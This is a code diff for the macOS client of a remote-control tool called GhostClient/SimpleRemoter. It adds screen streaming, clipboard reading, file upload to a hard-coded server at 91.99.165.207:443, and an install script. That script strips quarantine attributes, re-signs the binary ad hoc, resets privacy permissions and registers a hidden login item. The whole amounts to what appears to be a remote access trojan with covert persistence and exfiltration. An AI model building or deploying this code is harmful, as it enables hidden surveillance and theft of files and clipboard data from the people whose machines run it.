if (m_displayAssertionID == 0) {
IOReturn result = IOPMAssertionCreateWithName(
kIOPMAssertionTypeNoDisplaySleep,
kIOPMAssertionLevelOn,
CFSTR("SimpleRemoter - remote desktop session active"),
&m_displayAssertionID
);
if (result == kIOReturnSuccess) {
NSLog(@"Display sleep disabled (ID: %u)", m_displayAssertionID);
}
}
m_captureThread = std::thread(&ScreenHandler::captureLoop, this); m_captureThread = std::thread(&ScreenHandler::captureLoop, this);
} }
void ScreenHandler::stop() void ScreenHandler::stop()
{ {
m_running = false; m_running = false;
// Wake up capture thread if waiting
m_surfaceCond.notify_all();
if (m_captureThread.joinable()) { if (m_captureThread.joinable()) {
m_captureThread.join(); m_captureThread.join();
} }
@@ -130,6 +400,13 @@ void ScreenHandler::stop()
m_h264Encoder->close(); m_h264Encoder->close();
m_h264Encoder.reset(); m_h264Encoder.reset();
} }
// Release display sleep assertion - allow screen to turn off
if (m_displayAssertionID != 0) {
IOPMAssertionRelease(m_displayAssertionID);
NSLog(@"Display sleep re-enabled (released ID: %u)", m_displayAssertionID);
m_displayAssertionID = 0;
}
} }
void ScreenHandler::sendBitmapInfo() void ScreenHandler::sendBitmapInfo()
@@ -207,6 +484,125 @@ void ScreenHandler::OnReceive(uint8_t* data, ULONG size)
} }
break; break;
case COMMAND_SCREEN_SET_CLIPBOARD:
// 服务端设置剪贴板: [cmd:1][text:N]
if (size > 1) {
if (ClipboardHandler::SetTextRaw((const char*)(data + 1), size - 1)) {
NSLog(@">>> Clipboard SET: %zu bytes", size - 1);
} else {
NSLog(@"*** Clipboard SET failed");
}
}
break;
case COMMAND_SCREEN_GET_CLIPBOARD:
// 服务端请求剪贴板: [cmd:1][hash:64][hmac:16]
// 返回: [TOKEN_CLIPBOARD_TEXT:1][text:N] 或 [COMMAND_GET_FOLDER:1][files]
{
// 优先检查剪贴板中的文件
auto files = ClipboardHandler::GetFiles();
if (!files.empty()) {
// 返回 COMMAND_GET_FOLDER + 文件列表多字符串格式file1\0file2\0\0
std::vector<uint8_t> buf;
buf.push_back(COMMAND_GET_FOLDER);
for (const auto& f : files) {
// 文件路径需要转换为 GBK 编码(服务端预期)
std::string gbkPath = FileTransferV2::utf8ToGbk(f);
buf.insert(buf.end(), gbkPath.begin(), gbkPath.end());
buf.push_back(0); // 每个路径后的 null 终止符
}
buf.push_back(0); // 结束标记
m_client->Send2Server((char*)buf.data(), buf.size());
NSLog(@">>> Clipboard GET: %zu files", files.size());
break;
}
// 没有文件,返回文本
std::string text = ClipboardHandler::GetText();
if (!text.empty()) {
std::vector<uint8_t> buf(1 + text.size());
buf[0] = TOKEN_CLIPBOARD_TEXT;
memcpy(&buf[1], text.data(), text.size());
m_client->Send2Server((char*)buf.data(), buf.size());
NSLog(@">>> Clipboard GET: %zu bytes text", text.size());
} else {
// 返回空剪贴板
uint8_t empty = TOKEN_CLIPBOARD_TEXT;
m_client->Send2Server((char*)&empty, 1);
NSLog(@">>> Clipboard GET: empty");
}
}
break;
case COMMAND_GET_FILE:
// Server requests file download: [cmd:1][targetDir\0][file1\0file2\0...\0]
// Use V2 protocol to upload files
{
if (size < 3) break;
// Parse target directory (GBK encoding)
const char* ptr = (const char*)(data + 1);
const char* end = (const char*)(data + size);
std::string targetDirGbk = ptr;
std::string targetDir = FileTransferV2::gbkToUtf8(targetDirGbk);
ptr += targetDirGbk.length() + 1;
// Parse file list
std::vector<std::string> files;
while (ptr < end && *ptr != '\0') {
std::string fileGbk = ptr;
files.push_back(FileTransferV2::gbkToUtf8(fileGbk));
ptr += fileGbk.length() + 1;
}
// 如果没有文件列表,从剪贴板获取
if (files.empty()) {
files = ClipboardHandler::GetFiles();
}
if (!files.empty() && !targetDir.empty()) {
NSLog(@">>> COMMAND_GET_FILE: %zu files -> %s", files.size(), targetDir.c_str());
// Use V2 protocol to send files
IOCPClient* client = m_client;
std::thread([files, targetDir, client]() {
// Collect all files (expand directories)
std::vector<std::string> allFiles;
std::vector<std::string> rootCandidates;
for (const auto& path : files) {
struct stat st;
if (stat(path.c_str(), &st) != 0) continue;
if (S_ISDIR(st.st_mode)) {
std::string dirPath = path;
if (dirPath.back() != '/') dirPath += '/';
size_t pos = dirPath.rfind('/', dirPath.length() - 2);
std::string parentPath = (pos != std::string::npos) ? dirPath.substr(0, pos + 1) : dirPath;
rootCandidates.push_back(parentPath);
FileTransferV2::CollectFiles(dirPath, allFiles);
} else {
rootCandidates.push_back(path);
allFiles.push_back(path);
}
}
if (allFiles.empty()) {
NSLog(@"*** No files to send");
return;
}
std::string commonRoot = FileTransferV2::GetCommonRoot(rootCandidates);
NSLog(@">>> Sending %zu files, root=%s", allFiles.size(), commonRoot.c_str());
FileTransferV2::SendFilesV2(allFiles, targetDir, commonRoot, client, g_myClientID);
}).detach();
} else {
NSLog(@"*** COMMAND_GET_FILE: no files or empty target");
}
}
break;
default: default:
break; break;
} }
@@ -216,35 +612,67 @@ void ScreenHandler::applyQualityLevel(int8_t level, bool persist)
{ {
m_qualityLevel = level; m_qualityLevel = level;
// TODO: persist to config file if needed
(void)persist;
if (level == QUALITY_DISABLED) { if (level == QUALITY_DISABLED) {
NSLog(@"Quality: Disabled"); // Disabled mode: keep current settings
NSLog(@"Quality: Disabled (keep current)");
return; return;
} }
// Quality profiles: [FPS, Algorithm]
// H264 provides best compression for remote desktop
// Note: macOS uses slightly higher FPS than Windows for smoother experience
static const int profiles[QUALITY_COUNT][2] = {
{5, ALGORITHM_GRAY}, // Level 0: Emergency (very low bandwidth)
{10, ALGORITHM_RGB565}, // Level 1: Low
{15, ALGORITHM_H264}, // Level 2: Medium (office work default)
{20, ALGORITHM_H264}, // Level 3: Good
{25, ALGORITHM_H264}, // Level 4: High
{30, ALGORITHM_H264}, // Level 5: Smooth
};
if (level >= 0 && level < QUALITY_COUNT) { if (level >= 0 && level < QUALITY_COUNT) {
m_maxFPS.store(profiles[level][0]); // Get profile from commands.h (shared with Windows/Linux)
m_algorithm.store(profiles[level][1]); const QualityProfile& profile = GetQualityProfile(level);
NSLog(@"Quality: Level=%d, FPS=%d, Algo=%d", level, profiles[level][0], profiles[level][1]);
// Apply FPS
m_maxFPS.store(profile.maxFPS);
// Apply algorithm (macOS supports all algorithms including H264 via VideoToolbox)
m_algorithm.store(profile.algorithm);
// Update H264 bitrate if applicable
if (profile.algorithm == ALGORITHM_H264 && profile.bitRate > 0) {
m_h264Bitrate = profile.bitRate * 1000; // kbps -> bps
}
NSLog(@"Quality: Level=%d (%s), FPS=%d, Algo=%d, BitRate=%d kbps",
level,
level == QUALITY_ULTRA ? "Ultra" :
level == QUALITY_HIGH ? "High" :
level == QUALITY_GOOD ? "Good" :
level == QUALITY_MEDIUM ? "Medium" :
level == QUALITY_LOW ? "Low" : "Minimal",
profile.maxFPS, profile.algorithm, profile.bitRate);
} else { } else {
// Adaptive mode (level=-1): server adjusts dynamically
NSLog(@"Quality: Adaptive mode"); NSLog(@"Quality: Adaptive mode");
} }
} }
bool ScreenHandler::captureScreen(std::vector<uint8_t>& buffer) bool ScreenHandler::captureScreen(std::vector<uint8_t>& buffer)
{ {
// Create image from display // Try to use IOSurface from display stream (more efficient)
if (m_displayStream) {
IOSurfaceRef surface = nullptr;
{
std::lock_guard<std::mutex> lock(m_surfaceMutex);
if (m_latestSurface) {
surface = (IOSurfaceRef)CFRetain(m_latestSurface);
}
}
if (surface) {
bool result = captureFromIOSurface(surface, buffer);
CFRelease(surface);
if (result) {
return true;
}
}
// Fall through to legacy method if IOSurface failed
}
// Legacy method: CGDisplayCreateImage (fallback)
CGImageRef image = CGDisplayCreateImage(m_displayID); CGImageRef image = CGDisplayCreateImage(m_displayID);
if (!image) { if (!image) {
NSLog(@"Failed to capture screen image"); NSLog(@"Failed to capture screen image");
@@ -255,49 +683,58 @@ bool ScreenHandler::captureScreen(std::vector<uint8_t>& buffer)
size_t height = CGImageGetHeight(image); size_t height = CGImageGetHeight(image);
if (width != (size_t)m_width || height != (size_t)m_height) { if (width != (size_t)m_width || height != (size_t)m_height) {
// Screen resolution changed, need to reinitialize
CGImageRelease(image); CGImageRelease(image);
NSLog(@"Screen resolution changed: %zux%zu", width, height); NSLog(@"Screen resolution changed: %zux%zu", width, height);
return false; return false;
} }
// Create bitmap context to get raw pixel data
CGColorSpaceRef colorSpace = CGColorSpaceCreateDeviceRGB();
size_t bytesPerRow = width * 4; size_t bytesPerRow = width * 4;
size_t requiredSize = bytesPerRow * height;
// Temporary buffer for top-down BGRA if (m_tempBuffer.size() != requiredSize) {
std::vector<uint8_t> tempBuffer(bytesPerRow * height); m_tempBuffer.resize(requiredSize);
}
CGContextRef context = CGBitmapContextCreate( CGContextRef context = CGBitmapContextCreate(
tempBuffer.data(), m_tempBuffer.data(),
width, width,
height, height,
8, 8,
bytesPerRow, bytesPerRow,
colorSpace, m_colorSpace,
kCGImageAlphaPremultipliedFirst | kCGBitmapByteOrder32Little // BGRA kCGImageAlphaPremultipliedFirst | kCGBitmapByteOrder32Little
); );
CGColorSpaceRelease(colorSpace);
if (!context) { if (!context) {
CGImageRelease(image); CGImageRelease(image);
NSLog(@"Failed to create bitmap context"); NSLog(@"Failed to create bitmap context");
return false; return false;
} }
// Draw image into context
CGContextDrawImage(context, CGRectMake(0, 0, width, height), image); CGContextDrawImage(context, CGRectMake(0, 0, width, height), image);
CGContextRelease(context); CGContextRelease(context);
CGImageRelease(image); CGImageRelease(image);
// Flip vertically (BMP is bottom-up, CGImage is top-down) // Flip vertically using Accelerate framework
for (size_t y = 0; y < height; y++) { vImage_Buffer src = {
size_t srcRow = y; .data = m_tempBuffer.data(),
size_t dstRow = height - 1 - y; .height = (vImagePixelCount)height,
memcpy(buffer.data() + dstRow * bytesPerRow, .width = (vImagePixelCount)width,
tempBuffer.data() + srcRow * bytesPerRow, .rowBytes = bytesPerRow
bytesPerRow); };
vImage_Buffer dst = {
.data = buffer.data(),
.height = (vImagePixelCount)height,
.width = (vImagePixelCount)width,
.rowBytes = bytesPerRow
};
vImage_Error err = vImageVerticalReflect_ARGB8888(&src, &dst, kvImageNoFlags);
if (err != kvImageNoError) {
for (size_t y = 0; y < height; y++) {
memcpy(buffer.data() + (height - 1 - y) * bytesPerRow,
m_tempBuffer.data() + y * bytesPerRow,
bytesPerRow);
}
} }
return true; return true;
@@ -559,10 +996,11 @@ uint8_t ScreenHandler::getCursorTypeIndex()
// Reuse cursor position from getCursorPosition (called before this) // Reuse cursor position from getCursorPosition (called before this)
CGPoint pos = s_cachedLogicalPos; CGPoint pos = s_cachedLogicalPos;
// Throttle: only check if cursor moved significantly or 100ms elapsed // Throttle: only check if cursor moved significantly or 250ms elapsed
// (Accessibility API is expensive, cursor type is just a visual hint)
uint64_t now = getTickMs(); uint64_t now = getTickMs();
bool posChanged = (fabs(pos.x - lastPos.x) > 5 || fabs(pos.y - lastPos.y) > 5); bool posChanged = (fabs(pos.x - lastPos.x) > 10 || fabs(pos.y - lastPos.y) > 10);
if (!posChanged && (now - lastCheckTime) < 100) { if (!posChanged && (now - lastCheckTime) < 250) {
return cachedIndex; return cachedIndex;
} }
lastCheckTime = now; lastCheckTime = now;
@@ -635,13 +1073,12 @@ uint8_t ScreenHandler::getCursorTypeIndex()
void ScreenHandler::captureLoop() void ScreenHandler::captureLoop()
{ {
NSLog(@"ScreenHandler CaptureLoop started (%dx%d)", m_width, m_height); NSLog(@"ScreenHandler CaptureLoop started (%dx%d)%s", m_width, m_height,
m_displayStream ? " [CGDisplayStream]" : " [Legacy]");
uint8_t currentAlgo = m_algorithm.load(); uint8_t currentAlgo = m_algorithm.load();
// Always send raw first frame (TOKEN_FIRSTSCREEN) to initialize server display // Always send raw first frame (TOKEN_FIRSTSCREEN) to initialize server display
// This matches Windows client behavior: first frame is always raw bitmap,
// even in H264 mode. Server needs TOKEN_FIRSTSCREEN to set m_bIsFirst = FALSE.
sendFirstScreen(); sendFirstScreen();
// Small delay to ensure first frame is processed before H264 stream starts // Small delay to ensure first frame is processed before H264 stream starts
@@ -650,6 +1087,23 @@ void ScreenHandler::captureLoop()
while (m_running) { while (m_running) {
uint64_t start = getTickMs(); uint64_t start = getTickMs();
// Wait for new frame from display stream (push model)
// This is key optimization: CPU sleeps when screen is static
if (m_displayStream) {
std::unique_lock<std::mutex> lock(m_surfaceMutex);
int fps = m_maxFPS.load();
if (fps <= 0) fps = 15;
int waitMs = 1000 / fps;
// Wait for new frame or timeout (maintains FPS even if no change)
m_surfaceCond.wait_for(lock, std::chrono::milliseconds(waitMs), [this] {
return m_hasNewFrame.load() || !m_running;
});
m_hasNewFrame.store(false);
if (!m_running) break;
}
uint8_t algo = m_algorithm.load(); uint8_t algo = m_algorithm.load();
// Check if algorithm changed // Check if algorithm changed
@@ -657,18 +1111,14 @@ void ScreenHandler::captureLoop()
NSLog(@"Algorithm changed: %d -> %d", currentAlgo, algo); NSLog(@"Algorithm changed: %d -> %d", currentAlgo, algo);
currentAlgo = algo; currentAlgo = algo;
// If switching to/from H264, reset encoder
if (algo == ALGORITHM_H264) { if (algo == ALGORITHM_H264) {
// Starting H264 - will be initialized in sendH264Frame
sendH264Frame(true); // First H264 frame is keyframe sendH264Frame(true); // First H264 frame is keyframe
} else if (m_h264Encoder) { } else if (m_h264Encoder) {
// Switching away from H264 - close encoder
m_h264Encoder->close(); m_h264Encoder->close();
m_h264Encoder.reset(); m_h264Encoder.reset();
sendFirstScreen(); // Send full frame for DIFF modes sendFirstScreen();
} }
} else { } else {
// Normal frame
if (algo == ALGORITHM_H264) { if (algo == ALGORITHM_H264) {
sendH264Frame(false); sendH264Frame(false);
} else { } else {
@@ -676,14 +1126,17 @@ void ScreenHandler::captureLoop()
} }
} }
int fps = m_maxFPS.load(); // Only use sleep-based FPS control for legacy mode
if (fps <= 0) fps = 10; if (!m_displayStream) {
int sleepMs = 1000 / fps; int fps = m_maxFPS.load();
if (fps <= 0) fps = 10;
int sleepMs = 1000 / fps;
int elapsed = (int)(getTickMs() - start); int elapsed = (int)(getTickMs() - start);
int wait = sleepMs - elapsed; int wait = sleepMs - elapsed;
if (wait > 0) { if (wait > 0) {
usleep(wait * 1000); usleep(wait * 1000);
}
} }
} }

BIN
macos/ghost Normal file
View File

Binary file not shown.

122
macos/install.sh Normal file
View File

@@ -0,0 +1,122 @@
#!/bin/bash
# macOS Ghost Client 安装脚本
# 用法: ./install.sh [ghost路径]
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
APP_DIR="/Applications/GhostClient.app"
APP_BIN="$APP_DIR/Contents/MacOS/ghost"
# 源 binary 优先级:
# 1) 命令行参数显式指定
# 2) 脚本同目录的 ghost拷贝分发场景不带源码/不重编)
# 3) build/bin/ghost标准构建产物
if [ -n "$1" ]; then
GHOST_SRC="$1"
elif [ -f "$SCRIPT_DIR/ghost" ]; then
GHOST_SRC="$SCRIPT_DIR/ghost"
else
GHOST_SRC="$SCRIPT_DIR/build/bin/ghost"
fi
echo "=== GhostClient 安装程序 ==="
echo ""
# 检查源文件
if [ ! -f "$GHOST_SRC" ]; then
echo "错误: 找不到 ghost 二进制"
echo " 尝试过: $SCRIPT_DIR/ghost"
echo " 尝试过: $SCRIPT_DIR/build/bin/ghost"
echo ""
echo "请先编译: ./build.sh"
echo "或将 ghost 二进制放到脚本同目录"
echo "或指定路径: $0 <ghost可执行文件路径>"
exit 1
fi
echo "源文件: $GHOST_SRC"
echo ""
set -e
# 1. 停止旧进程
echo "[1/7] 停止旧进程..."
pkill -9 -f "$APP_BIN" 2>/dev/null || true
# 2. 重置系统权限(关键步骤!避免权限缓存导致空白桌面)
echo "[2/7] 重置系统权限..."
echo " (这会清除屏幕录制和辅助功能的旧授权,需要重新授权)"
tccutil reset ScreenCapture 2>/dev/null || true
tccutil reset Accessibility 2>/dev/null || true
# 3. 创建应用程序包
echo "[3/7] 创建应用程序..."
sudo rm -rf "$APP_DIR"
sudo mkdir -p "$APP_DIR/Contents/MacOS"
sudo mkdir -p "$APP_DIR/Contents/Resources"
# 复制 ghost 到 app bundle 内部
sudo cp "$GHOST_SRC" "$APP_BIN"
sudo chmod +x "$APP_BIN"
# 创建 Info.plist
sudo tee "$APP_DIR/Contents/Info.plist" > /dev/null << 'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>ghost</string>
<key>CFBundleIdentifier</key>
<string>com.ghost.client</string>
<key>CFBundleName</key>
<string>GhostClient</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>LSUIElement</key>
<true/>
</dict>
</plist>
EOF
# 4. 清除隔离属性
echo "[4/7] 清除隔离属性..."
sudo xattr -cr "$APP_DIR"
# 5. 签名应用ad-hoc 重签)
# 必须步骤Apple Silicon 上未签 / 签名失效的 binary 会被 AMFI 直接 SIGKILL。
# 常见破坏签名的场景:服务端 BuildDlg 在 Windows 端 patch 了 binary 里的服务器
# 地址 → 那一页的 SHA-256 hash 跟原签名块对不上 → AMFI 拒绝运行。
# --force 替换旧签名,--deep 覆盖 bundle 内所有可执行项,--sign - 是 ad-hoc。
echo "[5/7] 签名应用 (ad-hoc, 修复 binary 修改后的签名失效)..."
sudo codesign --force --deep --sign - "$APP_DIR"
# 6. 添加到登录项(开机自启)
echo "[6/7] 添加到登录项..."
osascript -e 'tell application "System Events" to delete login item "GhostClient"' 2>/dev/null || true
osascript -e 'tell application "System Events" to make login item at end with properties {path:"/Applications/GhostClient.app", hidden:true}' 2>/dev/null && echo " 已添加开机自启" || echo " 添加失败,请手动添加"
# 7. 完成
echo "[7/7] 安装完成!"
echo ""
echo "========================================"
echo " 下一步: 授权系统权限"
echo "========================================"
echo ""
echo "1. 启动应用 (会自动弹出权限请求):"
echo ""
echo " open /Applications/GhostClient.app"
echo ""
echo "2. 授权以下权限 (在系统设置中勾选 GhostClient):"
echo " - 屏幕录制: 允许捕获屏幕画面"
echo " - 辅助功能: 允许控制鼠标键盘"
echo ""
echo "3. 授权后重启应用:"
echo ""
echo " pkill -f GhostClient && open /Applications/GhostClient.app"
echo ""
echo "4. 查看日志确认运行状态:"
echo ""
echo " tail -f /tmp/ghost.log"
echo ""
echo "========================================"
echo ""

BIN
macos/lib/libsign.a Normal file
View File

Binary file not shown.

665
macos/main.mm
View File

@@ -1,36 +1,149 @@
#import <Cocoa/Cocoa.h> #import <Cocoa/Cocoa.h>
#import <sys/sysctl.h> #import <sys/sysctl.h>
#import <sys/stat.h>
#import <mach/mach.h> #import <mach/mach.h>
#import <mach-o/dyld.h> #import <mach-o/dyld.h>
#import <pwd.h> #import <pwd.h>
#import <signal.h> #import <signal.h>
#import <unistd.h> #import <unistd.h>
#import <fcntl.h>
#import <IOKit/IOKitLib.h> #import <IOKit/IOKitLib.h>
#import <IOKit/pwr_mgt/IOPMLib.h>
#import <fstream> #import <fstream>
#import <thread> #import <thread>
#import <atomic> #import <atomic>
#import <memory> #import <memory>
#import <string> #import <string>
#import <map>
#import "../client/IOCPClient.h" #import "../client/IOCPClient.h"
#define XXH_INLINE_ALL #define XXH_INLINE_ALL
#include "../common/xxhash.h" #include "../common/xxhash.h"
#include "../common/rtt_estimator.h"
#include "../common/client_auth_state.h"
#include "../common/posix_net_helpers.h"
#include "../common/sub_conn_thread.h"
#import "Permissions.h" #import "Permissions.h"
#import "ScreenHandler.h" #import "ScreenHandler.h"
#import "InputHandler.h" #import "InputHandler.h"
#import "SystemManager.h" #import "SystemManager.h"
#import "../common/PTYHandler.h"
#import "../common/FileManager.h"
#import "../common/FileTransferV2.h"
#import "../common/logger.h"
#import "ClipboardHandler.h"
// Global state // Global state
static std::atomic<bool> g_running(true); static std::atomic<bool> g_running(true);
static std::atomic<bool> g_needResendLogin(false); // 分组变更后需要重发登录信息
// Client ID (calculated from system info, used by ScreenHandler) // Client ID (calculated from system info, used by ScreenHandler)
uint64_t g_myClientID = 0; uint64_t g_myClientID = 0;
// 服务端身份校验全局状态已抽到 common/client_auth_state.hnamespace ClientAuth
// 远程地址:当前为写死状态,如需调试,请按实际情况修改 // 远程地址:当前为写死状态,如需调试,请按实际情况修改
CONNECT_ADDRESS g_SETTINGS = { FLAG_GHOST, "91.99.165.207", "443", CLIENT_TYPE_MACOS }; CONNECT_ADDRESS g_SETTINGS = { FLAG_GHOST, "91.99.165.207", "443", CLIENT_TYPE_MACOS };
State g_bExit = S_CLIENT_NORMAL; State g_bExit = S_CLIENT_NORMAL;
// ============== Configuration File Functions ==============
// Config path: ~/.config/ghost/config.conf (same as Linux)
// Format: key=value (one per line)
static std::string g_configDir;
static std::string g_configPath;
static std::map<std::string, std::string> g_configData;
// Initialize config paths
static void initConfigPaths()
{
if (!g_configDir.empty()) return; // Already initialized
const char* home = getenv("HOME");
if (!home) {
struct passwd* pw = getpwuid(getuid());
if (pw) home = pw->pw_dir;
}
if (!home) home = "/tmp";
g_configDir = std::string(home) + "/.config/ghost";
g_configPath = g_configDir + "/config.conf";
}
// Recursively create directory
static void mkdirRecursive(const std::string& path)
{
size_t pos = 0;
while ((pos = path.find('/', pos + 1)) != std::string::npos) {
mkdir(path.substr(0, pos).c_str(), 0755);
}
mkdir(path.c_str(), 0755);
}
// Load all config from file
static void loadConfig()
{
initConfigPaths();
g_configData.clear();
std::ifstream file(g_configPath);
if (!file.is_open()) return;
std::string line;
while (std::getline(file, line)) {
size_t eq = line.find('=');
if (eq != std::string::npos) {
g_configData[line.substr(0, eq)] = line.substr(eq + 1);
}
}
}
// Save all config to file
static void saveConfig()
{
initConfigPaths();
mkdirRecursive(g_configDir);
std::ofstream file(g_configPath, std::ios::trunc);
if (!file.is_open()) {
NSLog(@"Failed to save config to %s", g_configPath.c_str());
return;
}
for (const auto& kv : g_configData) {
file << kv.first << "=" << kv.second << "\n";
}
NSLog(@"Config saved to %s", g_configPath.c_str());
}
// Get config string value
static std::string getConfigStr(const std::string& key, const std::string& def = "")
{
auto it = g_configData.find(key);
return it != g_configData.end() ? it->second : def;
}
// Set config string value
static void setConfigStr(const std::string& key, const std::string& value)
{
g_configData[key] = value;
saveConfig();
}
// Save group name to config file
static void saveGroupName(const std::string& groupName)
{
setConfigStr("group_name", groupName);
NSLog(@"Group name saved: %s", groupName.c_str());
}
// Load group name from config file
static std::string loadGroupName()
{
return getConfigStr("group_name");
}
// ============== System Information Functions ============== // ============== System Information Functions ==============
// Get macOS version string (e.g., "macOS 14.0 Sonoma") // Get macOS version string (e.g., "macOS 14.0 Sonoma")
@@ -107,6 +220,54 @@ static std::string getUsername()
return user ? std::string(user) : "unknown"; return user ? std::string(user) : "unknown";
} }
// 读取 IOKit 维护的 IOPlatformUUID与 Windows MachineGuid 等价)
// 这是主板/系统级 UUID由 IOPlatformExpertDevice 服务提供,重装系统通常不变。
// 对应Windows HKLM\Software\Microsoft\Cryptography\MachineGuid
// Linux /etc/machine-id
static std::string getMachineId()
{
std::string result;
io_service_t platformExpert = IOServiceGetMatchingService(
kIOMasterPortDefault,
IOServiceMatching("IOPlatformExpertDevice"));
if (platformExpert != IO_OBJECT_NULL) {
CFTypeRef uuidProperty = IORegistryEntryCreateCFProperty(
platformExpert, CFSTR(kIOPlatformUUIDKey),
kCFAllocatorDefault, 0);
if (uuidProperty != nullptr) {
if (CFGetTypeID(uuidProperty) == CFStringGetTypeID()) {
CFStringRef uuidStr = (CFStringRef)uuidProperty;
char buf[64] = {};
if (CFStringGetCString(uuidStr, buf, sizeof(buf), kCFStringEncodingUTF8)) {
result = buf;
}
}
CFRelease(uuidProperty);
}
IOObjectRelease(platformExpert);
}
return result;
}
// 路径归一化macOS 版):解析符号链接 + 转小写
// realpath 把 /Applications/foo/../bar 之类折回规范形式;
// 小写化保持与 Windows/Linux 跨端一致。macOS HFS+/APFS 默认大小写不敏感,
// 转小写不改变文件标识、但避免路径串大小写差异引起 ID 不同。
static std::string normalizeExePathLower(const std::string& path)
{
char resolved[PATH_MAX] = {};
std::string out;
if (realpath(path.c_str(), resolved) != nullptr) {
out = resolved;
} else {
out = path; // 解析失败:用原值
}
for (auto& c : out) {
if (c >= 'A' && c <= 'Z') c = c - 'A' + 'a';
}
return out;
}
// Get screen resolution // Get screen resolution
static std::string getScreenResolution() static std::string getScreenResolution()
{ {
@@ -140,9 +301,113 @@ static std::string getTimeString()
return std::string([dateString UTF8String]); return std::string([dateString UTF8String]);
} }
// Get active application name // Get user idle time in seconds (time since last keyboard/mouse input)
static double getUserIdleTime()
{
// CGEventSourceSecondsSinceLastEventType returns seconds since last event
// kCGEventSourceStateCombinedSessionState includes all input sources
CFTimeInterval idleTime = CGEventSourceSecondsSinceLastEventType(
kCGEventSourceStateCombinedSessionState,
kCGAnyInputEventType
);
// Defensive: ensure non-negative (edge case protection)
return idleTime > 0 ? idleTime : 0;
}
// Check if screen is locked
static bool isScreenLocked()
{
// Method 1: Check CGSession dictionary for screen lock status
CFDictionaryRef sessionDict = CGSessionCopyCurrentDictionary();
if (sessionDict) {
// Check for "CGSSessionScreenIsLocked" key
CFBooleanRef screenLocked = (CFBooleanRef)CFDictionaryGetValue(
sessionDict, CFSTR("CGSSessionScreenIsLocked"));
if (screenLocked && CFBooleanGetValue(screenLocked)) {
CFRelease(sessionDict);
return true;
}
CFRelease(sessionDict);
}
// Method 2: Check if loginwindow is frontmost (screen saver / lock screen)
NSRunningApplication* frontApp = [[NSWorkspace sharedWorkspace] frontmostApplication];
if (frontApp) {
NSString* bundleId = [frontApp bundleIdentifier];
if ([bundleId isEqualToString:@"com.apple.loginwindow"] ||
[bundleId isEqualToString:@"com.apple.ScreenSaver.Engine"]) {
return true;
}
}
return false;
}
// Format time as HH:MM:SS with prefix
static std::string formatStatusTime(const char* prefix, double seconds)
{
int totalSecs = (int)seconds;
int hours = totalSecs / 3600;
int mins = (totalSecs % 3600) / 60;
int secs = totalSecs % 60;
char buffer[64];
snprintf(buffer, sizeof(buffer), "%s: %02d:%02d:%02d", prefix, hours, mins, secs);
return std::string(buffer);
}
// Get active application name or idle/locked status (works for background processes)
static std::string getActiveApp() static std::string getActiveApp()
{ {
double idleTime = getUserIdleTime();
// Check if screen is locked first
if (isScreenLocked()) {
return formatStatusTime("Locked", idleTime);
}
// Check user idle time (matches Windows/Linux: 6 seconds threshold)
// If idle for more than 6 seconds, report inactive status
if (idleTime >= 6.0) {
return formatStatusTime("Inactive", idleTime);
}
// Use CGWindowListCopyWindowInfo to get the frontmost window
// This works reliably even when running as a background/nohup process
CFArrayRef windowList = CGWindowListCopyWindowInfo(
kCGWindowListOptionOnScreenOnly | kCGWindowListExcludeDesktopElements,
kCGNullWindowID
);
if (windowList) {
CFIndex count = CFArrayGetCount(windowList);
for (CFIndex i = 0; i < count; i++) {
CFDictionaryRef window = (CFDictionaryRef)CFArrayGetValueAtIndex(windowList, i);
// Get window layer - layer 0 is normal windows
CFNumberRef layerRef = (CFNumberRef)CFDictionaryGetValue(window, kCGWindowLayer);
int layer = 0;
if (layerRef) {
CFNumberGetValue(layerRef, kCFNumberIntType, &layer);
}
// Skip non-normal windows (menu bar, dock, etc.)
if (layer != 0) continue;
// Get owner name (application name)
CFStringRef ownerName = (CFStringRef)CFDictionaryGetValue(window, kCGWindowOwnerName);
if (ownerName) {
char buffer[256] = {};
if (CFStringGetCString(ownerName, buffer, sizeof(buffer), kCFStringEncodingUTF8)) {
CFRelease(windowList);
return std::string(buffer);
}
}
}
CFRelease(windowList);
}
// Fallback to NSWorkspace (may not work for background processes)
NSRunningApplication* app = [[NSWorkspace sharedWorkspace] frontmostApplication]; NSRunningApplication* app = [[NSWorkspace sharedWorkspace] frontmostApplication];
if (app) { if (app) {
NSString* name = [app localizedName]; NSString* name = [app localizedName];
@@ -179,49 +444,12 @@ static bool hasCameraDevice()
// ============== Public IP ============== // ============== Public IP ==============
// Execute command and return output // Execute command and return output
static std::string execCmd(const std::string& cmd) // execCmd / httpGet / getPublicIP 已抽到 common/posix_net_helpers.hnamespace PosixNet
{ // 这里保留同名 wrapper 避免改动调用点。Linux 端额外的 jsonExtract / getGeoLocation
std::unique_ptr<FILE, decltype(&pclose)> pipe(popen(cmd.c_str(), "r"), pclose); // macOS 暂未使用,需要时直接用 PosixNet:: 命名空间访问。
if (!pipe) return ""; static inline std::string execCmd(const std::string& cmd) { return PosixNet::execCmd(cmd); }
char buf[4096]; static inline std::string httpGet(const std::string& url, int timeoutSec = 5) { return PosixNet::httpGet(url, timeoutSec); }
std::string result; static inline std::string getPublicIP() { return PosixNet::getPublicIP(); }
while (fgets(buf, sizeof(buf), pipe.get())) {
result += buf;
}
// Trim trailing whitespace
while (!result.empty() && (result.back() == '\n' || result.back() == '\r' || result.back() == ' '))
result.pop_back();
return result;
}
// HTTP GET using curl (macOS has curl built-in)
static std::string httpGet(const std::string& url, int timeoutSec = 5)
{
std::string t = std::to_string(timeoutSec);
return execCmd("curl -s --max-time " + t + " \"" + url + "\" 2>/dev/null");
}
// Get public IP (try multiple sources)
static std::string getPublicIP()
{
static const char* urls[] = {
"https://checkip.amazonaws.com",
"https://api.ipify.org",
"https://ipinfo.io/ip",
"https://icanhazip.com",
"https://ifconfig.me/ip",
};
for (auto& url : urls) {
std::string ip = httpGet(url, 3);
// Validate: non-empty, contains dot, reasonable length
if (!ip.empty() && ip.find('.') != std::string::npos && ip.size() <= 45) {
NSLog(@"getPublicIP: %s (from %s)", ip.c_str(), url);
return ip;
}
}
NSLog(@"getPublicIP: all sources failed");
return "";
}
// ============== Install Time (persistent storage) ============== // ============== Install Time (persistent storage) ==============
@@ -258,9 +486,25 @@ static void fillLoginInfo(LOGIN_INFOR& info)
// CPU MHz // CPU MHz
